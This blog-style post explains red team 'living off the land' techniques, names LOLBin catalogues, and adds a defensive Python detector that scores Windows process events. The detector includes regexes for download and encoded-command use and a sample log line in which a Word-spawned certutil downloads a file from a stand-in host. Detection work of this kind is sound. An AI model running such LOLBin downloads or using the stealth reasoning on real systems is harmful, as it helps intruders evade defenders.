Can your red team live off the land?
Learn what are living off the land techniques and why they are important during a red team engagement.
Imagine you are left in a jungle for a week. You carry a few basic tools such as a torch, a rope, a knife and a matchbox, but nothing else. Will you be able to survive in the jungle for a week with just these tools? You can, as long as you are willing to live off the land (i.e. the jungle) and survive on whatever the jungle has to offer (maybe a cave for shelter, snakes for food, a pond of stagnant water, etc.). To be able to do this, you'll need to know how to hunt, how to fight that bear in the cave, how to make your own fire and a host of other skills.
Similarly, as a red team operator it is important to know how to advance through the red team attack lifecycle during an engagement using only the tools already available within the target environment. In the red team context, this is known as living off the land. In other words, living off the land means blending into the digital environment by using what's already there to achieve your goals stealthily. For example, instead of uploading a tool to list files on a system, a red team operator might use the built-in `dir` command or the `Get-ChildItem` PowerShell cmdlet on Windows. This activity looks like a legitimate user working on the system.
Red Team Notes
- Repositories offering information about living off the land tools and techniques:
  - Windows - LOLBAS
  - Unix / Linux - GTFOBins
  - macOS - LOOBins
  - Drivers - LOLDrivers
  - Active Directory - LOLAD
  - Application-based techniques - LOLAPPS
  - Living off the Living Off the Land Project
Follow my journey of 100 Days of Red Team on WhatsApp or Discord.
This has multiple advantages:
- You don't need to bring in external tools, thus leaving no visible footprints behind.
- Your activities are camouflaged as normal activities of the environment.
- You are using tools that are signed and trusted, so there is a high likelihood that the system will trust whatever you do without sending out alerts.
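The advantages above are also the defender's problem statement: because the binaries are signed and run constantly on healthy hosts, the binary name alone is a weak signal and the context (parent process, command line) has to carry the detection. The following script is an added example and not code from the original post or from the LOLBAS project. It scores constructed process-creation events (field names loosely follow Sysmon Event ID 1: `Image`, `ParentImage`, `CommandLine`) against a small, hand-picked subset of binaries catalogued by LOLBAS; the parent-process list, the command-line patterns and the threshold are assumptions you would tune to your own telemetry. Note that the `dir` and `Get-ChildItem` usage from the post scores at or near zero on purpose: file listing by a user's shell is normal, and flagging it would only produce noise.

```python
"""Score Windows process-creation events for living-off-the-land (LOLBin) use.

Added example, not from the original post. Log lines below are constructed for
illustration. LOLBINS is a small subset of the LOLBAS catalogue (assumption:
in practice you would load the full project list).
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Subset of signed Windows binaries catalogued by LOLBAS.
LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "bitsadmin.exe",
           "regsvr32.exe", "powershell.exe"}

# Parents that rarely have a business reason to spawn a LOLBin (assumption).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wscript.exe"}

# Command-line fragments that point at download, decode or remote-code use.
CMDLINE_PATTERNS = [
    re.compile(r"https?://", re.I),
    re.compile(r"-decode\b", re.I),
    re.compile(r"-urlcache\b", re.I),
    re.compile(r"\bjavascript:", re.I),
    re.compile(r"-enc(odedcommand)?\b", re.I),
]


@dataclass
class Event:
    image: str
    parent_image: str
    command_line: str


def parse_event(line: str) -> Event:
    """Parse a constructed 'Key=Value|Key=Value' process-creation line."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return Event(fields["Image"], fields["ParentImage"], fields["CommandLine"])


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: Event) -> Tuple[int, List[str]]:
    """Return (score, reasons). Being a LOLBin is worth one point only;
    an unusual parent or a telling command line adds two points each."""
    image = basename(ev.image)
    if image not in LOLBINS:
        return 0, []
    score, reasons = 1, [f"lolbin:{image}"]
    parent = basename(ev.parent_image)
    if parent in SUSPICIOUS_PARENTS:
        score += 2
        reasons.append(f"parent:{parent}")
    for pat in CMDLINE_PATTERNS:
        if pat.search(ev.command_line):
            score += 2
            reasons.append(f"cmdline:{pat.pattern}")
    return score, reasons


# Constructed sample events: two benign listings, one quiet certutil run,
# and one certutil spawned by Word that fetches a file over HTTPS.
SAMPLE_LOG = [
    r"Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=cmd.exe /c dir C:\Users",
    r"Image=C:\Windows\System32\certutil.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=certutil -verify cert.cer",
    r"Image=C:\Windows\System32\certutil.exe|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|CommandLine=certutil -urlcache -f https://example.invalid/a.txt a.txt",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=powershell.exe Get-ChildItem C:\Users",
]


def triage(lines: List[str], threshold: int = 3) -> List[Tuple[str, int, List[str]]]:
    """Return (image, score, reasons) for every event at or above threshold."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((basename(ev.image), score, reasons))
    return hits


if __name__ == "__main__":
    for image, score, reasons in triage(SAMPLE_LOG):
        print(f"{image}: score={score} reasons={', '.join(reasons)}")
```

Only the Word-spawned `certutil` event crosses the threshold; the `dir`, `Get-ChildItem` and plain `certutil -verify` events stay below it. The scoring is deliberately additive so that a single weak indicator never pages anyone, which is the practical answer to "the system will trust whatever you do": the binary is trusted, the combination of parent and command line is not.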
The 2022 Ukraine Electric Power Attack and the Cutting Edge campaign are real-world examples where attackers leveraged living off the land techniques for exploitation.